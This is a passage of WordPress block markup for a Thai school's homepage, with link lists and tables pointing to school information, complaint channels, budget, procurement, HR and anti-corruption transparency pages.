ยนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 